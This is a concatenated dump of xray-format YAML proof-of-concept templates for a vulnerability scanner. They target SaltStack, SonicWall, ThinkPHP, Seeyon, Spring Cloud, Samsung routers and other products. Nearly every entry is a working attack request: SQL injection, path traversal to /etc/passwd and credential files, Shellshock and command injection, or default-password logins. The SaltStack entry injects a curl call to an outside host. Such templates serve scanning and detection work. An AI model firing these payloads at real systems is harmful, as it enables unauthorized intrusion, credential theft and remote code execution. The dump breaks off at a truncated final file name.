-------------------------------------------------------------------------------- 1 | name: poc-yaml-qizhi-fortressaircraft-unauthorized 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm 10 | expression: response.status == 200 && response.body.bcontains(b"错误的id") && response.body.bcontains(b"审计管理员") && response.body.bcontains(b"事件审计") 11 | expression: r0() 12 | detail: 13 | author: we1x4n(https://we1x4n.com/) 14 | links: 15 | - https://mp.weixin.qq.com/s/FjMRJfCqmXfwPzGYq5Vhkw 16 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/razor-cve-2018-8770.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-razor-cve-2018-8770 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /tests/generate.php 10 | follow_redirects: false 11 | expression: 'response.status == 200 && response.body.bcontains(b"Fatal error: Class ''PHPUnit_Framework_TestCase'' not found in ") && response.body.bcontains(b"/application/third_party/CIUnit/libraries/CIUnitTestCase.php on line")' 12 | expression: r0() 13 | detail: 14 | author: we1x4n(https://we1x4n.github.io/) 15 | links: 16 | - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8770 17 | - https://www.exploit-db.com/exploits/44495/ 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/resin-cnnvd-200705-315.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-resin-cnnvd-200705-315 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /%20../web-inf/ 10 | follow_redirects: false 11 | expression: response.status == 200 && 
response.body.bcontains(b"/ ../web-inf/") && response.body.bcontains(b"Directory of /") 12 | expression: r0() 13 | detail: 14 | author: whynot(https://github.com/notwhy) 15 | links: 16 | - https://www.secpulse.com/archives/39144.html 17 | - http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-315 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/resin-inputfile-fileread-or-ssrf.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-resin-inputfile-fileread-or-ssrf 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(bytes("<%@ page session=\"false\" import=\"com.caucho.vfs.*, com.caucho.server.webapp.*\" %>")) 12 | expression: r0() 13 | detail: 14 | author: whynot(https://github.com/notwhy) 15 | links: 16 | - https://www.secpulse.com/archives/496.html 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/resin-viewfile-fileread.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-resin-viewfile-fileread 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /resin-doc/viewfile/?file=index.jsp 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(bytes("%@ page session=\"false\" import=\"com.caucho.vfs.*, com.caucho.server.webapp.*\" %")) 12 | expression: r0() 13 | detail: 14 | author: whynot(https://github.com/notwhy) 15 | links: 16 | - https://www.cnvd.org.cn/flaw/show/CNVD-2006-3205 17 | - http://0day5.com/archives/1173/ 18 | -------------------------------------------------------------------------------- 
/pocs_yml/xrayFiles/rockmongo-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-rockmongo-default-password 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /index.php?action=login.index&host=0 10 | body: more=0&host=0&username=admin&password=admin&db=&lang=zh_cn&expire=3 11 | follow_redirects: false 12 | expression: response.status == 302 && response.headers["location"] == "/index.php?action=admin.index&host=0" 13 | expression: r0() 14 | detail: 15 | author: B1anda0(https://github.com/B1anda0) 16 | links: 17 | - https://www.runoob.com/mongodb/working-with-rockmongo.html 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/ruijie-uac-cnvd-2021-14536.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ruijie-uac-cnvd-2021-14536 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /login.php 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b"RG-UAC登录页面") && response.body.bcontains(b"get_dkey_passwd") && "\"password\":\"[a-f0-9]{32}\"".bmatches(response.body) 12 | expression: r0() 13 | detail: 14 | author: jweny(https://github.com/jweny) 15 | links: 16 | - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247483972&idx=1&sn=b51678c6206a533330b0279454335065 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/saltstack-cve-2020-16846.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-saltstack-cve-2020-16846 2 | manual: true 3 | transport: http 4 | set: 5 | reverse: newReverse() 6 | reverseURL: reverse.url 7 | rules: 8 | r0: 9 | request: 10 | cache: true 11 | method: POST 12 | path: /run 13 | body: 
token=12312&client=ssh&tgt=*&fun=a&roster=aaa&ssh_priv=aaa|curl+{{reverseURL}}%3b 14 | expression: reverse.wait(5) 15 | expression: r0() 16 | detail: 17 | author: we1x4n(https://we1x4n.com/) 18 | links: 19 | - https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag 20 | - https://github.com/vulhub/vulhub/blob/master/saltstack/CVE-2020-16846/README.zh-cn.md 21 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/samsung-wea453e-default-pwd.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-samsung-wea453e-default-pwd 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /main.ehp 10 | body: | 11 | httpd;General;lang=en&login_id=root&login_pw=sweap12~ 12 | follow_redirects: false 13 | expression: response.status == 200 && response.body.bcontains(bytes("document.formParent2.changepasswd1.value")) && response.body.bcontains(bytes("passwd_change.ehp")) 14 | expression: r0() 15 | detail: 16 | author: sharecast 17 | links: 18 | - https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ 19 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/samsung-wea453e-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-samsung-wea453e-rce 2 | manual: true 3 | transport: http 4 | set: 5 | r1: randomInt(40000, 44800) 6 | r2: randomInt(1140000, 1144800) 7 | rules: 8 | r0: 9 | request: 10 | cache: true 11 | method: POST 12 | path: /(download)/tmp/1.txt 13 | body: | 14 | command1=shell%3Aexpr {{r1}} - {{r2}}|dd of=/tmp/1.txt 15 | follow_redirects: false 16 | expression: response.status == 200 && response.body.bcontains(bytes(string(r1 - r2))) 17 | expression: r0() 18 | detail: 19 | author: sharecast 20 | links: 21 | - https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ 22 | 
-------------------------------------------------------------------------------- /pocs_yml/xrayFiles/sangfor-edr-arbitrary-admin-login.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sangfor-edr-arbitrary-admin-login 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /ui/login.php?user=admin 10 | follow_redirects: false 11 | expression: response.status == 302 && response.body.bcontains(b"/download/edr_installer_") && response.headers["Set-Cookie"] != "" 12 | expression: r0() 13 | detail: 14 | author: hilson 15 | links: 16 | - https://mp.weixin.qq.com/s/6aUrXcnab_EScoc0-6OKfA 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/sangfor-edr-tool-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sangfor-edr-tool-rce 2 | manual: true 3 | transport: http 4 | set: 5 | r1: randomLowercase(8) 6 | r2: randomLowercase(8) 7 | rules: 8 | r0: 9 | request: 10 | cache: true 11 | method: GET 12 | path: /tool/log/c.php?strip_slashes=printf&host={{r1}}%25%25{{r2}} 13 | follow_redirects: false 14 | expression: response.status == 200 && response.body.bcontains(bytes(r1 + "%" + r2)) 15 | expression: r0() 16 | detail: 17 | author: cookie 18 | links: 19 | - https://edr.sangfor.com.cn/ 20 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/seacms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seacms-sqli 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(202072102)))),@`%27` 10 | follow_redirects: true 11 | expression: response.status == 200 && 
response.body.bcontains(b"6f7c6dcbc380aac3bcba1f9fccec99") 12 | expression: r0() 13 | detail: 14 | author: MaxSecurity(https://github.com/MaxSecurity) 15 | links: 16 | - https://www.uedbox.com/post/54561/ 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/seacmsv645-command-exec.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seacmsv645-command-exec 2 | manual: true 3 | transport: http 4 | set: 5 | rand1: randomInt(200000000, 210000000) 6 | rand2: randomInt(200000000, 210000000) 7 | rules: 8 | r0: 9 | request: 10 | cache: true 11 | method: POST 12 | path: /search.php?searchtype=5 13 | body: searchtype=5&order=}{end if} {if:1)print({{rand1}}%2b{{rand2}});if(1}{end if} 14 | expression: response.body.bcontains(bytes(string(rand1 + rand2))) 15 | expression: r0() 16 | detail: 17 | author: Facker007(https://github.com/Facker007) 18 | links: 19 | - https://www.cnblogs.com/ffx1/p/12653597.html 20 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/seeyon-a6-employee-info-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-a6-employee-info-leak 2 | manual: true 3 | transport: http 4 | rules: 5 | poc10: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0 10 | expression: response.status == 200 && response.body.bcontains(b"[Content_Types].xml") && response.body.bcontains(b"Excel.Sheet") 11 | expression: poc10() 12 | detail: 13 | author: sakura404x 14 | links: 15 | - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md 16 | version: 致远A6 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/seeyon-cnvd-2020-62422-readfile.yml: 
-------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-cnvd-2020-62422-readfile 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties 10 | follow_redirects: false 11 | expression: response.status == 200 && response.content_type.icontains("application/x-msdownload") && response.body.bcontains(b"ctpDataSource.password") 12 | expression: r0() 13 | detail: 14 | author: Aquilao(https://github.com/Aquilao) 15 | links: 16 | - https://www.cnvd.org.cn/flaw/show/CNVD-2020-62422 17 | info: seeyon readfile(CNVD-2020-62422) 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/seeyon-session-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-session-leak 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /yyoa/ext/https/getSessionList.jsp?cmd=getAll 10 | expression: response.status == 200 && response.body.bcontains(b"\r\n\r\n") 11 | expression: r0() 12 | detail: 13 | author: sakura404x 14 | links: 15 | - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3345.md 16 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/seeyon-wooyun-2015-0108235-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-wooyun-2015-0108235-sqli 2 | manual: true 3 | transport: http 4 | set: 5 | rand: randomInt(200000000, 210000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /yyoa/ext/trafaxserver/downloadAtt.jsp?attach_ids=(1)%20and%201=2%20union%20select%201,2,3,4,5,md5({{rand}}),7-- 12 | expression: 
response.body.bcontains(bytes(md5(string(rand)))) 13 | expression: r0() 14 | detail: 15 | author: Rexus 16 | links: 17 | - https://bugs.shuimugan.com/bug/view?bug_no=0108235 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/seeyon-wooyun-2015-148227.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-wooyun-2015-148227 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml 10 | follow_redirects: false 11 | expression: response.status == 200 && response.content_type == "application/xml" && response.body.bcontains(bytes("NCInvokerServlet")) 12 | expression: r0() 13 | detail: 14 | author: canc3s(https://github.com/canc3s) 15 | links: 16 | - https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/shiziyu-cms-apicontroller-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-shiziyu-cms-apicontroller-sqli 2 | manual: true 3 | transport: http 4 | set: 5 | rand: randomInt(200000000, 210000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5({{rand}}),0x7e),1) 12 | expression: response.status == 404 && response.body.bcontains(bytes(substr(md5(string(rand)), 0, 31))) 13 | expression: r0() 14 | detail: 15 | author: sakura404x 16 | links: 17 | - https://blog.csdn.net/weixin_42633229/article/details/117070546 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/showdoc-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-showdoc-default-password 2 | 
manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /server/index.php?s=/api/user/login 10 | body: username=showdoc&password=123456 11 | follow_redirects: true 12 | expression: response.status == 200 && response.body.bcontains(b"uid") && response.body.bcontains(b"groupid") && response.body.bcontains(b"user_token") 13 | expression: r0() 14 | detail: 15 | author: B1anda0(https://github.com/B1anda0) 16 | links: 17 | - https://blog.star7th.com/2016/05/2007.html 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/solarwinds-cve-2020-10148.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-solarwinds-cve-2020-10148 2 | manual: true 3 | transport: http 4 | set: 5 | r1: randomInt(800000000, 1000000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /web.config.i18n.ashx?l=en-US&v={{r1}} 12 | expression: response.status == 200 && response.body.bcontains(bytes("SolarWinds.Orion.Core.Common")) && response.body.bcontains(bytes("/Orion/NetPerfMon/TemplateSiblingIconUrl")) 13 | expression: r0() 14 | detail: 15 | author: su(https://suzzz112113.github.io/#blog) 16 | links: 17 | - https://kb.cert.org/vuls/id/843464 18 | CVE: CVE-2020-10148 19 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/sonarqube-cve-2020-27986-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sonarqube-cve-2020-27986-unauth 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /api/settings/values 10 | expression: response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(bytes(string(b"sonaranalyzer-cs.nuget.packageVersion"))) && response.body.bcontains(bytes(string(b"sonar.core.id"))) 11 | expression: 
r0() 12 | detail: 13 | author: pa55w0rd(www.pa55w0rd.online/) 14 | links: 15 | - https://nvd.nist.gov/vuln/detail/CVE-2020-27986 16 | Affected Version: sonarqube < 8.4.2.36762 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/sonicwall-ssl-vpn-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sonicwall-ssl-vpn-rce 2 | manual: true 3 | transport: http 4 | set: 5 | r1: randomInt(40000, 44800) 6 | r2: randomInt(1140000, 1144800) 7 | rules: 8 | r0: 9 | request: 10 | cache: true 11 | method: GET 12 | path: /cgi-bin/jarrewrite.sh 13 | headers: 14 | X-Test: () { :; }; echo ; /bin/bash -c 'expr {{r1}} - {{r2}}' 15 | follow_redirects: false 16 | expression: response.status == 200 && response.body.bcontains(bytes(string(r1 - r2))) 17 | expression: r0() 18 | detail: 19 | author: sharecast 20 | links: 21 | - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ 22 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/spark-api-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spark-api-unauth 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /v1/submissions 10 | expression: response.status == 400 && response.body.bcontains(b"Missing an action") && response.body.bcontains(b"serverSparkVersion") 11 | expression: r0() 12 | detail: 13 | author: betta(https://github.com/betta-cyber) 14 | links: 15 | - https://xz.aliyun.com/t/2490 16 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/spark-webui-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spark-webui-unauth 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | 
path: / 10 | expression: response.status == 200 && response.body.bcontains(b"Spark") && response.body.bcontains(b"<strong>URL:</strong> spark:") 11 | expression: r0() 12 | detail: 13 | links: 14 | - https://github.com/vulhub/vulhub/tree/master/spark/unacc 15 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/spring-cloud-cve-2020-5405.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spring-cloud-cve-2020-5405 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/resolv.conf 10 | follow_redirects: true 11 | expression: response.status == 200 && response.body.bcontains(bytes("This file is managed by man:systemd-resolved(8). Do not edit.")) 12 | expression: r0() 13 | detail: 14 | author: kingkk(https://www.kingkk.com/) 15 | links: 16 | - https://pivotal.io/security/cve-2020-5405 17 | - https://github.com/spring-cloud/spring-cloud-config 18 | version: <= 2.1.6, 2.2.1 19 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/spring-cloud-cve-2020-5410.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spring-cloud-cve-2020-5410 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/a 10 | expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 11 | expression: r0() 12 | detail: 13 | author: Soveless(https://github.com/Soveless) 14 | links: 15 | - https://xz.aliyun.com/t/7877 16 | Affected Version: Spring Cloud Config 2.2.x < 2.2.3, 2.1.x < 2.1.9 17 | -------------------------------------------------------------------------------- 
/pocs_yml/xrayFiles/springcloud-cve-2019-3799.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-springcloud-cve-2019-3799 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /test/pathtraversal/master/..%252F..%252F..%252F..%252F..%252F..%252Fetc%252fpasswd 10 | follow_redirects: true 11 | expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 12 | expression: r0() 13 | detail: 14 | author: Loneyer 15 | links: 16 | - https://github.com/Loneyers/vuldocker/tree/master/spring/CVE-2019-3799 17 | version: <2.1.2, 2.0.4, 1.4.6 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/thinkcmf-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-thinkcmf-lfi 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /?a=display&templateFile=README.md 10 | expression: response.status == 200 && response.body.bcontains(bytes(string(b"ThinkCMF"))) && response.body.bcontains(bytes(string(b"## README"))) 11 | expression: r0() 12 | detail: 13 | author: JerryKing 14 | links: 15 | - https://www.freebuf.com/vuls/217586.html 16 | ThinkCMF: x1.6.0/x2.1.0/x2.2.0-2 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/thinkphp-controller-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-thinkphp5-controller-rce 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=a29hbHIgaXMg%25%25d2F0Y2hpbmcgeW91 10 | expression: response.body.bcontains(b"a29hbHIgaXMg%d2F0Y2hpbmcgeW9129") 11 | expression: r0() 12 | detail: 13 | links: 14 | - 
https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce 15 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/thinkphp-method-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-thinkphp5023-method-rce 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /index.php?s=captcha 10 | headers: 11 | Content-Type: application/x-www-form-urlencoded 12 | body: | 13 | _method=__construct&filter[]=printf&method=GET&server[REQUEST_METHOD]=TmlnaHQgZ2F0aGVycywgYW5%25%25kIG5vdyBteSB3YXRjaCBiZWdpbnMu&get[]=1 14 | expression: response.body.bcontains(b"TmlnaHQgZ2F0aGVycywgYW5%kIG5vdyBteSB3YXRjaCBiZWdpbnMu1") 15 | expression: r0() 16 | detail: 17 | links: 18 | - https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce 19 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/thinkphp5-controller-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-thinkphp5-controller-rce 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=a29hbHIgaXMg%25%25d2F0Y2hpbmcgeW91 10 | expression: response.body.bcontains(b"a29hbHIgaXMg%d2F0Y2hpbmcgeW9129") 11 | expression: r0() 12 | detail: 13 | links: 14 | - https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce 15 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/thinkphp5023-method-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-thinkphp5023-method-rce 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /index.php?s=captcha 10 | headers: 11 | 
Content-Type: application/x-www-form-urlencoded 12 | body: | 13 | _method=__construct&filter[]=printf&method=GET&server[REQUEST_METHOD]=TmlnaHQgZ2F0aGVycywgYW5%25%25kIG5vdyBteSB3YXRjaCBiZWdpbnMu&get[]=1 14 | expression: response.body.bcontains(b"TmlnaHQgZ2F0aGVycywgYW5%kIG5vdyBteSB3YXRjaCBiZWdpbnMu1") 15 | expression: r0() 16 | detail: 17 | links: 18 | - https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce 19 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/tianqing-info-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-tianqing-info-leak 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /api/dbstat/gettablessize 10 | expression: response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"schema_name") && response.body.bcontains(b"table_name") 11 | expression: r0() 12 | detail: 13 | author: jingling(https://github.com/shmilylty) 14 | links: 15 | - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g 16 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/tpshop-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-tpshop-sqli 2 | manual: true 3 | transport: http 4 | set: 5 | r: randomInt(800000000, 1000000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /mobile/index/index2/id/1) and (select 1 from (select count(*),concat(0x716b627671,(select md5({{r}})),0x716b627671,floor(rand(0)*2))x from information_schema.tables group by x)a)-- 12 | follow_redirects: true 13 | expression: response.body.bcontains(bytes(md5(string(r)))) 14 | expression: r0() 15 | detail: 16 | author: hanxiansheng26(https://github.com/hanxiansheng26) 17 | links: 18 | - https://xz.aliyun.com/t/6635 19 | Affected Version: tpshop<3.0 20 | 
-------------------------------------------------------------------------------- /pocs_yml/xrayFiles/uwsgi-cve-2018-7490.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-uwsgi-cve-2018-7490 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 10 | follow_redirects: false 11 | expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 12 | expression: r0() 13 | detail: 14 | links: 15 | - https://github.com/vulhub/vulhub/tree/master/uwsgi/CVE-2018-7490 16 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/vmware-vrealize-cve-2021-21975-ssrf.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-vmware-vrealize-cve-2021-21975-ssrf 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /casa/nodes/thumbprints 10 | headers: 11 | Content-Type: application/json 12 | body: | 13 | ["127.0.0.1:443/ui/"] 14 | follow_redirects: true 15 | expression: response.status == 200 && response.body.bcontains(bytes("vRealize Operations Manager")) 16 | expression: r0() 17 | detail: 18 | author: Loneyer 19 | links: 20 | - https://www.vmware.com/security/advisories/VMSA-2021-0004.html 21 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/weiphp-sql.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-weiphp-sql 2 | manual: true 3 | transport: http 4 | set: 5 | rand: randomInt(200000000, 210000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: 
/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5({{rand}}),0x7e),1)--+ 12 | expression: response.body.bcontains(bytes(substr(md5(string(rand)), 0, 31))) 13 | expression: r0() 14 | detail: 15 | author: sakura404x 16 | links: 17 | - https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md 18 | version: Weiphp<=5.0 19 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/wifisky-default-password-cnvd-2021-39012.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-wifisky-default-password-cnvd-2021-39012 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /login.php?action=login&type=admin 10 | body: username=admin&password=admin 11 | follow_redirects: false 12 | expression: response.status == 200 && response.body.bcontains(b"{\"success\":\"true\", \"data\":{\"id\":1}, \"alert\":\"您正在使用默认密码登录,为保证设备安全,请立即修改密码\"}") 13 | expression: r0() 14 | detail: 15 | author: Print1n(http://print1n.top) 16 | links: 17 | - https://www.cnvd.org.cn/flaw/show/CNVD-2021-39012 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/wordpress-cve-2019-19985-infoleak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-wordpress-cve-2019-19985-infoleak 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /wp-admin/admin.php?page=download_report&report=users&status=all 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b"Name,Email,Status,Created") && "(?i)filename=.*?.csv".bmatches(bytes(response.headers["Content-Disposition"])) 12 | expression: r0() 13 | detail: 14 | author: bufsnake(https://github.com/bufsnake) 
15 | links: 16 | - https://www.exploit-db.com/exploits/48698 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/wuzhicms-v410-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-wuzhicms-v410-sqli 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b"81dc9bdb52d04dc20036dbd8313ed05") && response.body.bcontains(b"sql_error:MySQL Query Error") 12 | expression: r0() 13 | detail: 14 | author: leezp 15 | links: 16 | - https://github.com/wuzhicms/wuzhicms/issues/184 17 | Affected Version: wuzhicms-v4.1.0 18 | vuln_url: /api/sms_check.php 19 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/xdcms-sql.yml: 